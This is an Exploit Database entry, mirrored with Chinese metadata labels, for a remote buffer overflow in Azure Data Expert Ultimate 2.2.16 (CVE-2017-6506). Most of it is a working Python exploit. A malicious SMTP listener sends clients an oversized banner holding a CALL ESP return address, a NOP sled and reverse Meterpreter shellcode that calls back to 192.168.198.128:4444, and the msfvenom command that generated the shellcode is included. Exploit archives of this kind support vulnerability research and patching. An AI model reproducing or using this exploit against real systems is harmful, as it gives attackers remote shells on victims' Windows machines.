Azure Data Expert Ultimate 2.2.16 – Remote Buffer Overflow

• Exploit Database
• 15 阅读

• 作者： Peter Baris
  日期： 2017-03-07
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41545/

• # Exploit Title: Azure Data Expert Ultimate 2.2.16 – buffer overflow
  # Date: 2017-03-07
  # Exploit Author: Peter Baris
  # Vendor Homepage: http://www.saptech-erp.com.au
  # Software Link: http://www.azuredex.com/downloads.html
  # Version: 2.2.16
  # Tested on: Windows Server 2008 R2 Standard x64
  # CVE : CVE-2017-6506
  
  # The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts.
  
  import socket
  
  # QtGui4.dll 0x6527635E - CALL ESP
  jmp = "\x5e\x63\x27\x65"
  nops = "\x90"*8
  
  
  # reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20 
  # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
  
  rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
  "\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
  "\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
  "\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
  "\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
  "\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
  "\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
  "\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
  "\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
  "\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
  "\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
  "\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
  "\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
  "\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
  "\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
  "\xc1\x48\x45\x0e\x32\x6b\x4c")
  
  
  rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
  "\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
  "\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
  "\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
  "\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
  "\xe2\x79\xdc\x2d\x97\x97")
  
  
  buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
  port = 25
  s = socket.socket()
  ip = '0.0.0.0' 
  s.bind((ip, port))
  s.listen(5)
  
   
  print 'Listening on SMTP port: '+str(port)
  if len(rev_met_1) >= 236:
  	print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.')
  	exit(1) 
  elif len(rev_met_2) >= 76:
  	print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.')
  	exit(1)
   
  while True:
  	conn, addr = s.accept() 
  	conn.send('220 '+buffer+'\r\n')
  	conn.close()